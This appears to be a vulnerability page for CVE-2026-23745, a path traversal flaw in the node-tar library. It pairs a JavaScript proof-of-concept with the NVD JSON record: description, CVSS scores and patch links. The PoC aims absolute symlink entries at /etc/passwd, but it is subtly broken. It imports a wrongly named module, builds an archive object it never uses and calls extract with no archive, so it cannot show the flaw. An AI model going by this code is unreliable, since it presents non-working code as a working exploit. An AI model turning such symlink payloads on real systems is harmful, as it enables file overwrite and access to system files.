CVE-2026-23745

const tar = require('node-tar'); const fs = require('fs'); const path = require('path'); // PoC for CVE-2026-23745: Path Traversal via symlink poisoning // Create a malicious tar archive that exploits the vulnerability // Step 1: Create a symbolic link entry with absolute path const maliciousLinkPath = '/etc/passwd'; const symlinkTarget = '../etc/passwd'; // Step 2: Demonstrate the vulnerable extraction async function exploitVulnerability() { // Create extraction directory const extractDir = './vulnerable_extract'; if (!fs.existsSync(extractDir)) { fs.mkdirSync(extractDir, { recursive: true }); } // This demonstrates the vulnerability - linkpath not sanitized // In vulnerable version (<=7.5.2), absolute paths in symlinks bypass root restriction try { // Create a tar with malicious symlink entry // The linkpath should be sanitized but isn't in vulnerable versions const maliciousArchive = { name: 'malicious.txt', linkname: '/etc/passwd', // Absolute path - should be blocked type: 'symlink' // or 'link' for hardlink attack }; // Extract using vulnerable code path await tar.extract({ cwd: extractDir, preservePaths: false, // Default secure option onReadEntry: (entry) => { // entry.linkname is not properly sanitized in vulnerable versions console.log('Entry linkname:', entry.linkname); } }); } catch (err) { console.error('Error:', err.message); } } // Mitigation: Upgrade to node-tar >= 7.5.3 console.log('Vulnerable versions: node-tar <= 7.5.2'); console.log('Fixed version: node-tar >= 7.5.3');

{"cve": {"id": "CVE-2026-23745", "sourceIdentifier": "[email protected]", "published": "2026-01-16T22:16:26.830", "lastModified": "2026-02-18T16:20:07.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3."}, {"lang": "es", "value": "node-tar es un Tar para Node.js. La biblioteca node-tar (&lt;= 7.5.2) no sanea la ruta de enlace de las entradas Link (enlace duro) y SymbolicLink cuando preservePaths es falso (el comportamiento seguro predeterminado). Esto permite a archivos maliciosos eludir la restricción de la raíz de extracción, lo que lleva a la Sobrescritura Arbitraria de Archivos mediante enlaces duros y al Envenenamiento de Symlink mediante destinos de symlink absolutos. Esta vulnerabilidad está corregida en 7.5.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isaacs:tar:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "7.5.3", "matchCriteriaId": "BF78DB31-ACED-49B8-ABE8-ADD4C5E4DAF6"}]}]}], "references": [{"url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}